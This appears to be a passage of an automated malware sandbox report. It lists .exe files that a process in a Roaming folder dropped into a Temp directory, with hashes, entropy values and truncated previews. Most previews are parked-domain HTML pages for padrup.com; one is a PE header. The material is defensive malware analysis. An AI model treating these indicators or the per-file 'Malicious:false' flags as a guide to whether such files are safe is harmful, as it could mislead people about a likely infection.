                                                                                                                                                                                                                                                                                          Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d...f..e..........".......,......... k.........@..............................A......<A...`..........................................'3......+3.P.....8......P6..e....@.((....A. 1..h.2.T.....................2.(...P"-.@............33.......3. ....................text...E.,.......,................. ..`.rdata..$#....-..$....,.............@..@.data........@4.......4.............@....pdata...e...P6..f...45.............@..@.00cfg..0.....7.......6.............@..@.gxfg...@4....7..6....6.............@..@.retplne......8.......6..................tls....-.... 8.......6.............@...CPADinfo8....08.......6.............@...LZMADEC......@8.......6............. ..`_RDATA..\....`8.......6.............@..@malloc_h.....p8.......6............. ..`.rsrc.........8.......6.............@..@.reloc.. 1....A..2....?.............@..B........................................................

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\dliyqj.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6496878055806175
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwSNVUuMqUtmtE9VC7h6cBBDH3M7ioaxyi6CV7MTf992wP:IN2uUh9VUdX6i1yi7Sl928
                                                                                                                                                                                                                                                                                          MD5:7B9DC7CA1EB7C8432259768397C097B7
                                                                                                                                                                                                                                                                                          SHA1:1C53A23AEFE38CD06E96442E70CA683E86E8FB10
                                                                                                                                                                                                                                                                                          SHA-256:B9AB734043A5B1AFA6AB8B77B0D957BB1F61BA909203F4D664026C31E94C3E03
                                                                                                                                                                                                                                                                                          SHA-512:E8AE56D7E557543337A465EFA1DCF65264CDA1769896B4E6B8480F32131D1C6C0F30085C33A91EB2F039EAB34E33981634A79F9E7B12D0229C1C6C935B9B3F5A
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE3NS42NjcyOjQyZTM1MTJjNzdlYmM1YjBiMzQxYzgwNDQ2NDA4ZDA3ODA1MjhmY2ZjOTM3YTIwMDBkOWMyNjI3OTIwNTNmOTM6NjcxMjNiYWZhMmUzMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JhZmEyZGYxfHx8MTcyOTI0ODE3

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\hqsb.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (357)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.652949460417062
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwd0MqUtmtE9VCYdxPhM7ioaxyi6CVVCMTf992wP:tdAUh9VVgi1yi7V7l928
                                                                                                                                                                                                                                                                                          MD5:D3C7F2399B76A0FC796393A0E34DEB4D
                                                                                                                                                                                                                                                                                          SHA1:C0E4C7921DCEB8060597A796568B7EDE5F98B191
                                                                                                                                                                                                                                                                                          SHA-256:DD0C6C04C966F1BC7C401361F2E6D0ACF3480E0E9FA578692E9E346A67AA7ED1
                                                                                                                                                                                                                                                                                          SHA-512:229A314A8DDA92B3B503C6247A2CB9DCAAE0848D8B85E5DF8C2E467A8ED071A6B6189ADCE777E71D7BD77E3BC4155C0D6223B19A854C9A7831B3F288BE667F95
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODIyNC43ODc5OjRjNDdkOGRjNDgwNjFlNmJmZDFkM2ZjMGJlMmJmZmIxNGYzOTAxMjI1NGM3ZWZkNGMxZWU3YmQyNjQxMzcxYjc6NjcxMjNiZTBjMDVjOQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JlMGMwNTkwfHx8MTcyOTI0ODIy

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\jnptrh.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.641297642746322
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFAPTZMqUtmtE9VCrPcB6c1o3M7ioaxyi6CVsMTf992wP:9PT7Uh9VPM4ni1yi7Nl928
                                                                                                                                                                                                                                                                                          MD5:7A85D4A8F2A9D0941EFDBED182EF150A
                                                                                                                                                                                                                                                                                          SHA1:BA578A8840E64A2CCDCF133359DB954FC2A1393B
                                                                                                                                                                                                                                                                                          SHA-256:EA2435AF0A8CB4D91C01CBE31878A65C4A32B88AC129920C25FBECE0F9C6A7EB
                                                                                                                                                                                                                                                                                          SHA-512:3BA4DF42BEF40E7C0FB280C0C55FD6DE9756FBD0777EDA9E7C465DE36D93D4BE6ABD4DC7028C469E47130B2DD05AFE13787912476063515795BA43CAD0294967
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE5Mi42MzU3OmY5OGYxNjExYTRlMTA2ZDdiMGMyYjIyNzE2OWMxNDUyNmU4ODg2OGZjYzE5OTcyMzEzYWYxNDIxZGQ4YWJjMGU6NjcxMjNiYzA5YjMyNg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JjMDliMmQ5fHx8MTcyOTI0ODE5

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\kpmw.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.653477497800643
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwIlMqUtmtE9VCeIcBwU3M7ioaxyi6CV61MTf992wP:LI3Uh9V3ezi1yi7Ll928
                                                                                                                                                                                                                                                                                          MD5:D47CA73FA6B17517CA1A7E035C3377AE
                                                                                                                                                                                                                                                                                          SHA1:6FA083043CBF0A6A9511D69BE5AEEE82C0E18589
                                                                                                                                                                                                                                                                                          SHA-256:0F3120E4020E72C93004C68A3993A52CB41409919DC06D582FAA426653FD1456
                                                                                                                                                                                                                                                                                          SHA-512:892687A70089EA29B61A1ECD9AB3264E56EEE354ECF5F244FFC176FEE8ABE7AA388CA78A4E70A81B90D90C56F10A8A294DB18A91397E976388B12B1A3E50EB17
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI3My42NjM4OjYwMDkyN2FiZmRiYzBhNWI4Y2QwYzIyZDE3ZjZhMjQyMjA4YmZmYzE5MmQyZjFiYTM4MDJjNTExOWMxODk0Njk6NjcxMjNjMTFhMjBlNA==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MxMWEyMGEwfHx8MTcyOTI0ODI3

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\kyre.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6496765740040775
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFNMqUtmtE9VCAhbcBQwgm3M7ioaxyi6CV7MTf992wP:WUh9Vsqjhi1yi7Sl928
                                                                                                                                                                                                                                                                                          MD5:A8AC3A613F8991EA4ED519DD24AB4D86
                                                                                                                                                                                                                                                                                          SHA1:29F6E04F42C5BF8434EEDAB0CB238B187A3FA671
                                                                                                                                                                                                                                                                                          SHA-256:09D08E18FB7F2F84C4BC26516530E44DF9DEFEF7AAF069C8021AFA5B820D05CE
                                                                                                                                                                                                                                                                                          SHA-512:24515ED77ED3F1281286704378A96A02DFC479A9AE2E500302F8637997631012940ED551A5DF373ACC12DDAF11F2C894C2B32A2AF5F57E6E75DE0D2B3ED92A95
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE1MC4xMTEyOmM5OWYzY2UwNjliMzQ4MDQ1ZTA0ZTY5OTFjZGY3NmU3NmUyYzI5MmMwOGY3ODFjN2I5NWMyYjU0MTM2YjIxMDU6NjcxMjNiOTYxYjI3Ng==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I5NjFiMjM2fHx8MTcyOTI0ODE1

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\lmto.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (357)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.643452822066541
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFGobMqUtmtE9VCTtd6M7ioaxyi6CVMYQnMTf992wP:QpUh9VMi1yi7MYQel928
                                                                                                                                                                                                                                                                                          MD5:C5A926CA8AFB2642CACE1E601D9E5CF4
                                                                                                                                                                                                                                                                                          SHA1:6CDF3DF52B35283D05B5C5CE1B422E41F4E6C958
                                                                                                                                                                                                                                                                                          SHA-256:74F88EE0A30EC4FADB744E180AE79571959BDC3D62C9A5F561A4D31A76F980C0
                                                                                                                                                                                                                                                                                          SHA-512:42B8AE7D4919681C9901457036A0AFD951036449C793A73A9F5B17DEF51CB5A845484C522C3FB4324E0D749DBFC44FF4EF61412059A50767EFE8618DE00778A0
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI2MC42MzI2OmU1ZTBkZWExYTllOWIwMmZlODA2MDQ5NTM2MzM0ZGEwM2FjYWRlZWQ3NTczMTMzMWIwZDUxOTA3NWU0MTg1NWY6NjcxMjNjMDQ5YTcwMw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2MwNDlhNmQxfHx8MTcyOTI0ODI2

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\mlhr.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.644033992642338
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFko0MqUtmtE9VCKcBda3M7ioaxyi6CVwAEMTf992wP:7FUh9VKvFi1yi7wAll928
                                                                                                                                                                                                                                                                                          MD5:C2CCB01C0454A96DE5CB0D589283F74B
                                                                                                                                                                                                                                                                                          SHA1:A63DB87742467DE378D0F32242EADD7D6C587877
                                                                                                                                                                                                                                                                                          SHA-256:71A73EEDC5EC3353ED03ABC5A0532801A177C8C76DE97065FFF06E2682AADBE1
                                                                                                                                                                                                                                                                                          SHA-512:0C4D43C69751D25E1F20632556F2FF5A4EF579FD728F47D321A0AB70A3823CAC1343BDF7725852372F6320CA33DD84BA277A01337F10E7F966BEA028B2C238A7
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE4Ni43ODkxOjE5MWJiOTk1MDNhNzllMTAyOTU5MmZiNDY3NmVjNjg1ZTk4NzhkMDVhN2YzOTU0MTA0MTk2NTk2N2E3MGE0ZTk6NjcxMjNiYmFjMGE2Ng==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JiYWMwYTM5fHx8MTcyOTI0ODE4

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ngpa.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.646891353429371
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFwMqUtmtE9VC+y5cBrT3M7ioaxyi6CVqTMTf992wP:pUh9VFwi1yi7qKl928
                                                                                                                                                                                                                                                                                          MD5:55DF63F8653B2855DB913418AC8D8E5C
                                                                                                                                                                                                                                                                                          SHA1:D33A1F8984BA7DD52D6012E55C92E5ED6628F276
                                                                                                                                                                                                                                                                                          SHA-256:9D684C4B2B67FF99A9BD367C634B958E589757740664545DA6255494B733EDAF
                                                                                                                                                                                                                                                                                          SHA-512:8A9EDC61C288EAD3609BE336423C88D8A73E219C77847C8B101E2934D326AA428D6FB72696E61792F7943428AF10C580AFD44F64EAD372813C59ED24055A6826
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE4MS40MTM2OjFmZWJlMzc1ZTI3OWEzNDZkNmM3YjExNWJjY2RhNmE5Y2FkYzY4YmQxYTUwOTVkYmJmZTcwOTRmYzNlYjExODc6NjcxMjNiYjU2NGZhMg==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JiNTY0ZjRkfHx8MTcyOTI0ODE4

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nimgtv.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.640501547020023
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFdEkMqUtmtE9VCSqdfcBs3M7ioaxyi6CVi+KMTf992wP:7wUh9VVqq5i1yi7xl928
                                                                                                                                                                                                                                                                                          MD5:0625B11B4D3D9BCA7EDB8C57E71C8275
                                                                                                                                                                                                                                                                                          SHA1:AEAC1E7FB773D377902DCE3ED4D5628E3070A417
                                                                                                                                                                                                                                                                                          SHA-256:FDAFBFFF851F29B0D023B7D2A592724C0DFC1C8536E060B31E960530E694A304
                                                                                                                                                                                                                                                                                          SHA-512:F6647EC28AC29C1BF6FE9685D9AD5B36761C7E481ADD75161125608A7F70F06F183701362EA8615802F05DEF46BEFFAF215D10531B83D348B666753AC2D67D4F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODE5OS41MzI0OjQ0OTcwNWJlOTdhZDYxOGIyM2YzNDc1N2I3MGNjMmZjYjA4YmM1YThkZDgxNGM2ZGFhZTUyN2JhNTNhZjg2YTY6NjcxMjNiYzc4MWY4Yw==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JjNzgxZjQ4fHx8MTcyOTI0ODE5

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nyxrw.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2261
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.648448044755032
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFB9JMqUtmtE9VC8u7ScBv3M7ioaxyi6CV9NMTf992wP:OrUh9VziVki1yi79kl928
                                                                                                                                                                                                                                                                                          MD5:83ADB970C1E063C3F0B165B873D313D7
                                                                                                                                                                                                                                                                                          SHA1:749F49E90D69527250697837539A8971470144D4
                                                                                                                                                                                                                                                                                          SHA-256:0DE8C7A6AB8844C26F2C74096835367002DA775C31E8E5BA00E39918A6EBC4B6
                                                                                                                                                                                                                                                                                          SHA-512:6C49B99F203CC5F4189312355F290E106344977C4DED3CFB80D0E8FA216C04BB1C2632A3968F75D6710419111B2DF3912AA637691B92D74F238D913371E2387F
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODI1NC42MTI6YjdlMDZlYjdjOTQyOGRjMjg3ZWQyNWFjYWJjZTc4YzgxYzRhNDk5Y2QyODI0Y2JiMGNkZTgyYzk5MzE5YTQ3Njo2NzEyM2JmZTk1Njdl';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2JmZTk1NjQ1fHx8MTcyOTI0ODI1NC44

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\ognr.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.65365913496466
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFPBgMqUtmtE9VCYtcBQwY3M7ioaxyi6CVZn0MTf992wP:XUh9Vbini1yi7FVl928
                                                                                                                                                                                                                                                                                          MD5:2BC75C9B48FCF746FD2B696251BC7DDD
                                                                                                                                                                                                                                                                                          SHA1:EBCA366415785190EFC672B0548EC6C5F1DF7B83
                                                                                                                                                                                                                                                                                          SHA-256:2C41B88753084CFDC17BE88F357D5D752A03D537F065CA571F5C7D54F9C02F35
                                                                                                                                                                                                                                                                                          SHA-512:DB4F0415C84CA77C26382038C2A5AC196CB6AC6F1A7AD83D8F38169DAF54CBE1860E5DD99E2AB45B3C30A6A53EA37246A0F53BC4011DB4355544F6506870D404
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN". "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">.<html xmlns="http://www.w3.org/1999/xhtml">..<head>...<title>padrup&#46;com</title>...<meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>...<script type='text/javascript' language='JavaScript'>.var domain = 'padrup.com';.var uniqueTrackingID = 'MTcyOTI0ODEzMi44ODYxOjA3MGQwNThjNTg2YTg1MGUwNjdiNjAzZGMyYjU1NGNjZTU2NTQzOTkyYzgxMjYzY2QwNTMzYTY2YmZmY2VhZWI6NjcxMjNiODRkODU2OQ==';.var clickTracking = false;.var themedata = '';.var xkw = '';.var xsearch = '';.var xpcat = '';.var bucket = '';.var clientID = '';.var clientIDs = '';.var num_ads = 0;.var adtest = 'off';.var scriptPath = '';...</script>...<script src='//d38psrni17bvxu.cloudfront.net/scripts/js3.js' type='text/javascript' language='JavaScript'></script>...<script type="text/javascript">themedata = 'fENsZWFuUGVwcGVybWludEJsYWNrfHw1Y2U4NHxidWNrZXQxMDJ8fHx8fHw2NzEyM2I4NGQ4NTNjfHx8MTcyOTI0ODEz

                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\oktye.exe

                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (361)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):2265
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.6502419620932685
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:+mazpFLaMqUtmtE9VCKcBf3M7ioaxyi6CV9MTf992wP:eKUh9VeEi1yi7Ul928
                                                                                                                                                                                                                                                                                          MD5:60BE7D14C6C89C0D2E72B11D61FFCE96
